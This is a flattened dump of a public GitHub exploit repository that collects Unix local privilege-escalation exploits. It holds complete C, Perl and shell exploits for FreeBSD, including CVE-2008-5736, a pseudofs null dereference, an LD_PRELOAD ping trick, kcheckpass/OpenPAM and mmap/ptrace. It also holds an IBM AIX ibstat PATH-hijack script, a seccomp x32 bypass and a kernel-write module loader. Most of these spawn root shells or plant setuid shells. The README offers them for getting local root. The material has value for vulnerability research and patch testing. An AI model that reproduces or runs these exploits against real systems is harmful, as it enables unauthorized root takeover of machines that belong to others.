https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/utils/kernwrite/kernwrite.mod.o -------------------------------------------------------------------------------- /2014/ekit/utils/kernwrite/kernwrite.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/utils/kernwrite/kernwrite.o -------------------------------------------------------------------------------- 
/2014/ekit/utils/kernwrite/modules.order: -------------------------------------------------------------------------------- 1 | kernel//home/vpk/ret2dir/exploits/kernwrite/kernwrite.ko 2 | -------------------------------------------------------------------------------- /2014/ekit/utils/load_kernwrite.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #define INSMOD_PATH "/sbin/insmod" 10 | #define INIT_PRE_CMD "/sbin/rmmod kernwrite > /dev/null 2>&1" 11 | #define INIT_POST_CMD "/bin/chmod go+rx /sys/kernel/debug" 12 | 13 | 14 | /* helper; initialize the `kernwrite' module */ 15 | int 16 | main(int argc, char **argv) 17 | { 18 | /* exit status */ 19 | int status; 20 | 21 | 22 | /* argument validation */ 23 | if (argc <= 1) { 24 | /* failed */ 25 | fprintf(stderr, "[-] %s \n", argv[0]); 26 | goto err; 27 | } 28 | 29 | /* pre initialization */ 30 | if (system(INIT_PRE_CMD) == -1) { 31 | /* failed */ 32 | fprintf(stderr, "[-] system() failed -- %s\n", 33 | strerror(errno)); 34 | goto err; 35 | } 36 | 37 | /* load the module */ 38 | switch (fork()) { 39 | case -1: 40 | /* fork() failed */ 41 | fprintf(stderr, "[-] fork() failed -- %s\n", 42 | strerror(errno)); 43 | goto err; 44 | 45 | /* not reached */ 46 | break; 47 | 48 | case 0: 49 | /* child; `insmod' */ 50 | execlp(INSMOD_PATH, INSMOD_PATH, argv[1], NULL); 51 | 52 | /* failed */ 53 | fprintf(stderr, "[-] exec() failed -- %s\n", 54 | strerror(errno)); 55 | 56 | goto err; 57 | 58 | /* not reached */ 59 | break; 60 | 61 | default: 62 | /* parent; wait for `insmod' to complete */ 63 | wait(&status); 64 | 65 | if (WEXITSTATUS(status) != 0) 66 | /* child failed */ 67 | goto err; 68 | 69 | /* done */ 70 | break; 71 | } 72 | 73 | /* post initialization */ 74 | if (system(INIT_POST_CMD) == -1) { 75 | /* failed */ 76 | fprintf(stderr, "[-] system() failed -- %s\n", 77 | strerror(errno)); 78 | 
goto err; 79 | } 80 | 81 | /* done; return with success */ 82 | return EXIT_SUCCESS; 83 | 84 | err: 85 | /* done; return with an error */ 86 | return EXIT_FAILURE; 87 | } 88 | -------------------------------------------------------------------------------- /2014/seccomp-exp/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -m64 -o hu hu.c 3 | -------------------------------------------------------------------------------- /2014/seccomp-exp/hu.c: -------------------------------------------------------------------------------- 1 | /* compile with -m64 */ 2 | #include "seccomp-bpf.h" 3 | 4 | static int install_syscall_filter(void) 5 | { 6 | struct sock_filter filter[] = { 7 | VALIDATE_ARCHITECTURE, 8 | EXAMINE_SYSCALL, 9 | DISALLOW_SYSCALL(execve), 10 | CONTINUE_EXEC, 11 | }; 12 | struct sock_fprog prog = { 13 | .len = (unsigned short)(sizeof(filter)/sizeof(filter[0])), 14 | .filter = filter, 15 | }; 16 | 17 | if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog)) { 18 | perror("prctl(SECCOMP)"); 19 | goto failed; 20 | } 21 | return 0; 22 | 23 | failed: 24 | if (errno == EINVAL) 25 | fprintf(stderr, "SECCOMP_FILTER is not available. 
:(\n"); 26 | return 1; 27 | } 28 | 29 | char *path = "/usr/bin/id"; 30 | char *blah2[] = { "/usr/bin/id", NULL }; 31 | 32 | int main(int argc, char *argv[]) 33 | { 34 | if (install_syscall_filter()) 35 | return 1; 36 | 37 | /* perform X32(not i386) execve */ 38 | asm volatile ( 39 | ".intel_syntax noprefix\n" 40 | "mov rdi, path\n" 41 | "lea rsi, blah2\n" 42 | "xor rdx, rdx\n" 43 | "mov rax, 0x40000208\n" 44 | "syscall\n" 45 | ".att_syntax noprefix\n" 46 | ); 47 | 48 | // execl("/usr/bin/id", "/usr/bin/id", NULL); 49 | 50 | return 0; 51 | } 52 | -------------------------------------------------------------------------------- /2014/seccomp-exp/seccomp-bpf.h: -------------------------------------------------------------------------------- 1 | /* 2 | * seccomp example for x86 (32-bit and 64-bit) with BPF macros 3 | * 4 | * Copyright (c) 2012 The Chromium OS Authors 5 | * Authors: 6 | * Will Drewry 7 | * Kees Cook 8 | * 9 | * Use of this source code is governed by a BSD-style license that can be 10 | * found in the LICENSE file. 11 | */ 12 | #ifndef _SECCOMP_BPF_H_ 13 | #define _SECCOMP_BPF_H_ 14 | 15 | #define _GNU_SOURCE 1 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | 24 | #include 25 | #ifndef PR_SET_NO_NEW_PRIVS 26 | # define PR_SET_NO_NEW_PRIVS 38 27 | #endif 28 | 29 | #include 30 | #include 31 | #include 32 | #ifdef HAVE_LINUX_SECCOMP_H 33 | # include 34 | #endif 35 | #ifndef SECCOMP_MODE_FILTER 36 | # define SECCOMP_MODE_FILTER 2 /* uses user-supplied filter. 
*/ 37 | # define SECCOMP_RET_KILL 0x00000000U /* kill the task immediately */ 38 | # define SECCOMP_RET_TRAP 0x00030000U /* disallow and force a SIGSYS */ 39 | # define SECCOMP_RET_ALLOW 0x7fff0000U /* allow */ 40 | struct seccomp_data { 41 | int nr; 42 | __u32 arch; 43 | __u64 instruction_pointer; 44 | __u64 args[6]; 45 | }; 46 | #endif 47 | #ifndef SYS_SECCOMP 48 | # define SYS_SECCOMP 1 49 | #endif 50 | 51 | #define syscall_nr (offsetof(struct seccomp_data, nr)) 52 | #define arch_nr (offsetof(struct seccomp_data, arch)) 53 | 54 | #if defined(__i386__) 55 | # define REG_SYSCALL REG_EAX 56 | # define ARCH_NR AUDIT_ARCH_I386 57 | #elif defined(__x86_64__) 58 | # define REG_SYSCALL REG_RAX 59 | # define ARCH_NR AUDIT_ARCH_X86_64 60 | #else 61 | # warning "Platform does not support seccomp filter yet" 62 | # define REG_SYSCALL 0 63 | # define ARCH_NR 0 64 | #endif 65 | 66 | #define VALIDATE_ARCHITECTURE \ 67 | BPF_STMT(BPF_LD+BPF_W+BPF_ABS, arch_nr), \ 68 | BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, ARCH_NR, 1, 0), \ 69 | BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL) 70 | 71 | #define EXAMINE_SYSCALL \ 72 | BPF_STMT(BPF_LD+BPF_W+BPF_ABS, syscall_nr) 73 | 74 | #define ALLOW_SYSCALL(name) \ 75 | BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, __NR_##name, 0, 1), \ 76 | BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW) 77 | 78 | #define DISALLOW_SYSCALL(name) \ 79 | BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, __NR_##name, 0, 1), \ 80 | BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL) 81 | 82 | #define KILL_PROCESS \ 83 | BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL) 84 | 85 | #define CONTINUE_EXEC \ 86 | BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW) 87 | 88 | #endif /* _SECCOMP_BPF_H_ */ 89 | -------------------------------------------------------------------------------- /BSD/2005/FreeBSDmaster.passwd.c: -------------------------------------------------------------------------------- 1 | /* 2 | ** FreeBSD master.passwd disclosure exploit 3 | ** by kcope in 2005, kingcope[at]gmx.net 4 | ** thanks to revoguard 5 | ** just compile and 
execute .. look into the kmem file 6 | ** it contains the master.passwd 7 | ** tested on unpatched FreeBSD 4.11-RELEASE 8 | ** advisory: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-05:02.sendfile.asc 9 | ** +++KEEP PRIV8+++ 10 | */ 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | 20 | #define BUF_SIZ 4096 21 | 22 | void dolisten() { 23 | int s,c; 24 | struct sockaddr_in addr; 25 | struct sockaddr_in cli; 26 | socklen_t cli_size; 27 | char buf[BUF_SIZ]; 28 | FILE *f=fopen("kmem", "w"); 29 | 30 | addr.sin_addr.s_addr = INADDR_ANY; 31 | addr.sin_port = htons(31337); 32 | addr.sin_family = AF_INET; 33 | 34 | s = socket(PF_INET, SOCK_STREAM, 0); 35 | if (bind(s, (struct sockaddr*) &addr, sizeof(addr)) == -1) 36 | { 37 | perror("bind() failed"); 38 | exit(1); 39 | } 40 | 41 | listen(s, 3); 42 | 43 | c = accept(s, (struct sockaddr*) &cli, &cli_size); 44 | 45 | while (recv(c, buf, sizeof(buf) - 1, 0) > 0) { 46 | fwrite(buf, sizeof(buf), 1, f); 47 | } 48 | 49 | } 50 | 51 | int main() { 52 | int input_fd,fd,s,k; 53 | struct stat file_info; 54 | off_t offset = 0; 55 | FILE *f; 56 | int i=0; 57 | struct sockaddr_in addr; 58 | char st[]="A"; 59 | 60 | f=fopen("sendfile1", "w"); 61 | for (i=0; i!=64000000; i++) { 62 | fwrite(st, 1, 1, f); 63 | } 64 | fclose(f); 65 | 66 | input_fd = open ("sendfile1", O_RDWR); 67 | fstat (input_fd, &file_info); 68 | 69 | if (fork() != 0) { 70 | sleep(2); 71 | s = socket(PF_INET, SOCK_STREAM, 0); 72 | 73 | addr.sin_addr.s_addr = INADDR_ANY; 74 | addr.sin_port = htons(31337); 75 | addr.sin_family = AF_INET; 76 | 77 | if (connect(s, (struct sockaddr*) &addr, sizeof(addr)) == -1) 78 | { 79 | perror("connect() failed"); 80 | return 2; 81 | } 82 | 83 | if (fork() != 0) { 84 | if (sendfile (input_fd, s, offset, 64000000, NULL, NULL, 0) == -1) { 85 | perror("sendfile()"); 86 | return -1; 87 | } 88 | } else { 89 | f=fopen("sendfile1", "w"); 90 | fclose(f); 91 | for (k=0;k!=10;k++) 
92 | system("/usr/bin/chsh -s /bin/sh"); 93 | wait(); 94 | } 95 | } else { 96 | dolisten(); 97 | wait(); 98 | } 99 | return 0; 100 | } -------------------------------------------------------------------------------- /BSD/2008/CVE-2008-5736.c: -------------------------------------------------------------------------------- 1 | /* 2 | * This is a quick and very dirty exploit for the FreeBSD protosw vulnerability 3 | * defined here: 4 | * http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc 5 | * 6 | * This will overwrite your credential structure in the kernel. This will 7 | * affect more than just the exploit's process, which is why this doesn't 8 | * spawn a shell. When the exploit has finished, your login shell should 9 | * have euid=0. 10 | * 11 | * Enjoy, and happy holidays! 12 | * - Don "north" Bailey (don.bailey@gmail.com) 12/25/2008 13 | */ 14 | 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | 28 | #define PAGES 1 29 | #define PATTERN1 0x8f8f8f8f 30 | #define PATTERN2 0x6e6e6e6e 31 | 32 | typedef unsigned long ulong; 33 | typedef unsigned char uchar; 34 | 35 | int 36 | x(void) 37 | { 38 | struct proc * p = (struct proc * )PATTERN1; 39 | uint * i; 40 | 41 | while(1) 42 | { 43 | if(p->p_pid == PATTERN2) 44 | { 45 | i = (uint * )p->p_ucred; 46 | *++i = 0; 47 | break; 48 | } 49 | 50 | p = p->p_list.le_next; 51 | } 52 | 53 | return 1; 54 | } 55 | 56 | int 57 | main(int argc, char * argv[]) 58 | { 59 | ulong addr; 60 | uchar * c; 61 | uchar * d; 62 | uint * i; 63 | void * v; 64 | int pid; 65 | int s; 66 | 67 | if(argc != 2) 68 | { 69 | fprintf(stderr, "usage: ./x \n"); 70 | return 1; 71 | } 72 | 73 | addr = strtoul(argv[1], 0, 0); 74 | 75 | v = mmap( 76 | NULL, 77 | (PAGES*PAGE_SIZE), 78 | PROT_READ|PROT_WRITE|PROT_EXEC, 79 | MAP_ANON|MAP_FIXED, 80 | -1, 81 | 0); 82 | if(v == MAP_FAILED) 83 | { 84 | perror("mmap"); 85 | return 
0; 86 | } 87 | 88 | c = v; 89 | d = (uchar * )x; 90 | while(1) 91 | { 92 | *c = *d; 93 | if(*d == 0xc3) 94 | { 95 | break; 96 | } 97 | 98 | d++; 99 | c++; 100 | } 101 | 102 | *c++ = 0xc3; 103 | 104 | c = v; 105 | while(1) 106 | { 107 | if(*(long * )c == PATTERN1) 108 | { 109 | *(c + 0) = addr >> 0; 110 | *(c + 1) = addr >> 8; 111 | *(c + 2) = addr >> 16; 112 | *(c + 3) = addr >> 24; 113 | break; 114 | } 115 | c++; 116 | } 117 | 118 | pid = getpid(); 119 | while(1) 120 | { 121 | if(*(long * )c == PATTERN2) 122 | { 123 | *(c + 0) = pid >> 0; 124 | *(c + 1) = pid >> 8; 125 | *(c + 2) = pid >> 16; 126 | *(c + 3) = pid >> 24; 127 | break; 128 | } 129 | c++; 130 | } 131 | 132 | s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA); 133 | if(s < 0) 134 | { 135 | perror("socket"); 136 | return 1; 137 | } 138 | 139 | shutdown(s, SHUT_RDWR); 140 | 141 | return 0; 142 | } 143 | 144 | // milw0rm.com [2008-12-28] 145 | -------------------------------------------------------------------------------- /BSD/2009/2009-4146.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | echo ** FreeBSD local r00t zeroday 3 | echo by Kingcope 4 | echo November 2009 5 | cat > env.c << _EOF 6 | #include 7 | 8 | main() { 9 | extern char **environ; 10 | environ = (char**)malloc(8096); 11 | 12 | environ[0] = (char*)malloc(1024); 13 | environ[1] = (char*)malloc(1024); 14 | strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0"); 15 | 16 | execl("/sbin/ping", "ping", 0); 17 | } 18 | _EOF 19 | gcc env.c -o env 20 | cat > program.c << _EOF 21 | #include 22 | #include 23 | #include 24 | #include 25 | 26 | void _init() { 27 | extern char **environ; 28 | environ=NULL; 29 | system("echo ALEX-ALEX;/bin/sh"); 30 | } 31 | _EOF 32 | gcc -o program.o -c program.c -fPIC 33 | gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles 34 | cp w00t.so.1.0 /tmp/w00t.so.1.0 35 | ./env 36 | -------------------------------------------------------------------------------- 
/BSD/2010/2010-2020/nfs_mount_ex: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/BSD/2010/2010-2020/nfs_mount_ex -------------------------------------------------------------------------------- /BSD/2010/2010-4210.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Source: http://www.securityfocus.com/bid/43060/info 3 | * 18.08.2010, babcia padlina 4 | * FreeBSD 7.0 - 7.2 pseudofs null ptr dereference exploit 5 | * 6 | * 7 | * to obtain SYSENT8_SYCALL_ADDR, run: 8 | * $ kgdb /boot/kernel/kernel 9 | * (kgdb) print &sysent[8].sy_call 10 | */ 11 | 12 | #define SYSENT8_SYCALL_ADDR 0xc0c4afa4 /* FreeBSD 7.2-RELEASE */ 13 | 14 | #define _KERNEL 15 | 16 | #include 17 | #include 18 | #include 19 | 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | #include 33 | #include 34 | 35 | struct turnstile { 36 | struct mtx ts_lock; 37 | struct threadqueue ts_blocked[2]; 38 | struct threadqueue ts_pending; 39 | LIST_ENTRY(turnstile) ts_hash; 40 | LIST_ENTRY(turnstile) ts_link; 41 | LIST_HEAD(, turnstile) ts_free; 42 | struct lock_object *ts_lockobj; 43 | struct thread *ts_owner; 44 | }; 45 | 46 | volatile int gotroot = 0; 47 | 48 | static void kernel_code(void) { 49 | struct thread *thread; 50 | 51 | asm( 52 | "movl %%fs:0, %0" 53 | : "=r"(thread) 54 | ); 55 | 56 | /* 57 | * kernel_code() is called while thread is in critical section, 58 | * so we need to unset td_critnest flag to prevent panic after 59 | * nearest user mode page fault. 
60 | */ 61 | thread->td_critnest = 0; 62 | thread->td_proc->p_ucred->cr_uid = 0; 63 | thread->td_proc->p_ucred->cr_prison = NULL; 64 | gotroot = 1; 65 | 66 | return; 67 | } 68 | 69 | int main(int argc, char **argv) { 70 | struct turnstile *ts = 0; 71 | 72 | if (access("/proc/curproc/cmdline", R_OK)) { 73 | printf("procfs not found.\n"); 74 | return -1; 75 | } 76 | 77 | if (mmap(0, PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_FIXED, -1, 0) == MAP_FAILED) { 78 | printf("mmap 0x0 failed.\n"); 79 | return -1; 80 | } 81 | 82 | memset(0, 0, PAGE_SIZE); 83 | 84 | /* 85 | * we need to call dummy extattr_get_link() here, to make 86 | * libc memory pages accessible without user mode page fault. without 87 | * it, panic will occur after next extattr_get_link(). 88 | */ 89 | extattr_get_link("/dev/null", 0, 0, 0, 0); 90 | 91 | /* overwrite sysent[8].sy_call with 0x0 */ 92 | ts->ts_blocked[0].tqh_first = (void *)(SYSENT8_SYCALL_ADDR - 0x1c); 93 | extattr_get_link("/proc/curproc/cmdline", 0, 0, 0, 0); 94 | 95 | *(char *)0x0 = 0x90; 96 | *(char *)0x1 = 0xe9; 97 | *(unsigned long *)0x2 = &kernel_code; 98 | 99 | asm( 100 | "movl $0x8, %eax;" 101 | "int $0x80;" 102 | ); 103 | 104 | if (gotroot) { 105 | printf("oops, I did it again.\n"); 106 | setuid(0); 107 | setgid(0); 108 | execl("/bin/sh", "sh", NULL); 109 | } 110 | 111 | printf("exploit failed.\n"); 112 | 113 | return 0; 114 | } 115 | -------------------------------------------------------------------------------- /BSD/2011/8.1/bsd.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | # kcheckpass invoking pam_start() with user provided 4 | # service argument, what a bad idea. OpenPAM accepts that. 5 | # Maybe this pam_start() vulnerability is exploitable via 6 | # other vectors as well. 7 | # Vuln tested on a FreeBSD 8.1. It does not affect 8 | # Linux PAM, as it is checking for / character 9 | 10 | # (C) 2011 by some dude, meant as a PoC! 
Only use on your own 11 | # machine and on your own risk!!! 12 | # 13 | # This commit is likely to fix the bug: 14 | # http://trac.des.no/openpam/changeset/478/trunk/lib/openpam_configure.c 15 | # 16 | 17 | my $kcheckpass = "/usr/local/kde4/lib/kde4/libexec/kcheckpass"; 18 | 19 | # build suid shell 20 | open(O,">/tmp/slam.c") or die $!; 21 | print O< 24 | #include 25 | 26 | void __attribute__((constructor)) init() 27 | { 28 | char *a[] = {"/bin/sh", NULL}; 29 | setuid(0); 30 | execve(*a, a, NULL); 31 | } 32 | EOC 33 | close(O); 34 | 35 | # build fake pam module 36 | system("gcc -fPIC -Wall -c /tmp/slam.c -o /tmp/slam.o;gcc -shared -o /tmp/slam.so /tmp/slam.o"); 37 | 38 | # build fake PAM service file 39 | open(O,">/tmp/pamslam") or die $!; 40 | print O</tmp/slam.c") or die $!; 60 | print O< 63 | #include 64 | 65 | void __attribute__((constructor)) init() 66 | { 67 | char *a[] = {"/bin/sh", NULL}; 68 | setuid(0); 69 | execve(*a, a, NULL); 70 | } 71 | EOC 72 | close(O); 73 | 74 | # build fake pam module 75 | system("gcc -fPIC -Wall -c /tmp/slam.c -o /tmp/slam.o;gcc -shared -o /tmp/slam.so /tmp/slam.o"); 76 | 77 | # build fake PAM service file 78 | open(O,">/tmp/pamslam") or die $!; 79 | print O< 4 | * 5 | * Happy Birthday FreeBSD! 6 | * Now you are 20 years old and your security is the same as 20 years ago... 
:) 7 | * 8 | * Greetings to #nohup, _2501, boldi, eax, johnny_b, kocka, op, pipacs, prof, 9 | * sd, sghctoma, snq, spender, s2crew and others at #hekkcamp: 10 | * I hope we'll meet again at 8@1470n ;) 11 | * 12 | * Special thanks to proactivesec.com 13 | * 14 | */ 15 | 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | 29 | #define SH "/bin/sh" 30 | #define TG "/usr/sbin/timedc" 31 | 32 | int 33 | main(int ac, char **av) { 34 | int from_fd, to_fd, status; 35 | struct stat st; 36 | struct ptrace_io_desc piod; 37 | char *s, *d; 38 | pid_t pid; 39 | 40 | if (geteuid() == 0) { 41 | setuid(0); 42 | execl(SH, SH, NULL); 43 | return 0; 44 | } 45 | 46 | printf("FreeBSD 9.{0,1} mmap/ptrace exploit\n"); 47 | printf("by Hunger \n"); 48 | 49 | if ((from_fd = open(av[0], O_RDONLY)) == -1 || 50 | (to_fd = open(TG, O_RDONLY)) == -1) 51 | err(1, "open"); 52 | 53 | if (stat(av[0], &st) == -1) 54 | err(2, "stat"); 55 | 56 | if (((s = mmap(NULL, (size_t)st.st_size, PROT_READ, 57 | MAP_SHARED, from_fd, (off_t)0)) == MAP_FAILED) || 58 | (d = mmap(NULL, (size_t)st.st_size, PROT_READ, 59 | MAP_SHARED|MAP_NOSYNC, to_fd, (off_t)0)) == MAP_FAILED) 60 | err(3, "mmap"); 61 | 62 | if ((pid = fork()) == -1) 63 | err(4, "fork"); 64 | 65 | if (!pid) { 66 | if (ptrace(PT_TRACE_ME, pid, NULL, 0) == -1) 67 | err(5, "ptraceme"); 68 | 69 | return 0; 70 | } 71 | 72 | if (ptrace(PT_ATTACH, pid, NULL, 0) == -1) 73 | err(6, "ptattach"); 74 | 75 | if (wait(&status) == -1) 76 | err(7, "wait"); 77 | 78 | piod.piod_op = PIOD_WRITE_D; 79 | piod.piod_offs = d; 80 | piod.piod_addr = s; 81 | piod.piod_len = st.st_size; 82 | 83 | if (ptrace(PT_IO, pid, (caddr_t)&piod, 0) == -1) 84 | err(8, "ptio"); 85 | 86 | execl(TG, TG, NULL); 87 | 88 | return 0; 89 | } 90 | -------------------------------------------------------------------------------- /BSD/2013/9.0/9.0: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/BSD/2013/9.0/9.0 -------------------------------------------------------------------------------- /IBM_AIX/2013/aix-r00t.sh: -------------------------------------------------------------------------------- 1 | # Also available as a module in Metasploit 2 | 3 | # Exploit-DB Note: Screenshot provided by exploit author 4 | # 5 | 6 | #!/bin/sh 7 | # Exploit Title: IBM AIX 6.1 / 7.1 local root privilege escalation 8 | # Date: 2013-09-24 9 | # Exploit Author: Kristian Erik Hermansen 10 | # Vendor Homepage: http://www.ibm.com 11 | # Software Link: http://www-03.ibm.com/systems/power/software/aix/about.html 12 | # Version: IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02 13 | # Tested on: IBM AIX 6.1 14 | # CVE: CVE-2013-4011 15 | echo ' 16 | mm mmmmm m m 17 | ## # # # 18 | # # # ## 19 | #mm# # m""m 20 | # # mm#mm m" "m 21 | ' 22 | echo "[*] AIX root privilege escalation" 23 | echo "[*] Kristian Erik Hermansen" 24 | echo "[*] https://linkedin.com/in/kristianhermansen" 25 | echo " 26 | +++++?????????????~.:,.:+???????????++++ 27 | +++++???????????+...:.,.,.=??????????+++ 28 | +++???????????~.,:~=~:::..,.~?????????++ 29 | +++???????????:,~==++++==~,,.?????????++ 30 | +++???????????,:=+++++++=~:,,~????????++ 31 | ++++?????????+,~~=++++++=~:,,:????????++ 32 | +++++????????~,~===~=+~,,::,:+???????+++ 33 | ++++++???????=~===++~~~+,,~::???????++++ 34 | ++++++++?????=~=+++~~~:++=~:~+???+++++++ 35 | +++++++++????~~=+++~+=~===~~:+??++++++++ 36 | +++++++++?????~~=====~~==~:,:?++++++++++ 37 | ++++++++++????+~==:::::=~:,+??++++++++++ 38 | ++++++++++?????:~~=~~~~~::,??+++++++++++ 39 | ++++++++++?????=~:~===~,,,????++++++++++ 40 | ++++++++++???+:==~:,,.:~~..+??++++++++++ 41 | +++++++++++....==+===~~=~,...=?+++++++++ 42 | ++++++++,........~=====..........+++++++ 43 | 
+++++................................++= 44 | =+:....................................= 45 | " 46 | TMPDIR=/tmp 47 | TAINT=${TMPDIR}/arp 48 | RSHELL=${TMPDIR}/r00t-sh 49 | 50 | cat > ${TAINT} <<-! 51 | #!/bin/sh 52 | cp /bin/sh ${RSHELL} 53 | chown root ${RSHELL} 54 | chmod 4555 ${RSHELL} 55 | ! 56 | 57 | chmod 755 ${TAINT} 58 | PATH=.:${PATH} 59 | export PATH 60 | cd ${TMPDIR} 61 | /usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null 62 | if [ -e ${RSHELL} ]; then 63 | echo "[+] Access granted. Don't be evil..." 64 | ${RSHELL} 65 | else 66 | echo "[-] Exploit failed. Try some 0day instead..." 67 | fi -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Unix-Privilege-Escalation-Exploits-Pack 2 | ======================================= 3 | 4 | Exploits for getting local root on Linux, BSD, AIX, HP-UX, Solaris, RHEL, SUSE etc. 5 | If anyone is willing to work with me and organize this better, it will be helpful to many... 6 | 7 | --------------------------------------------------------------------------------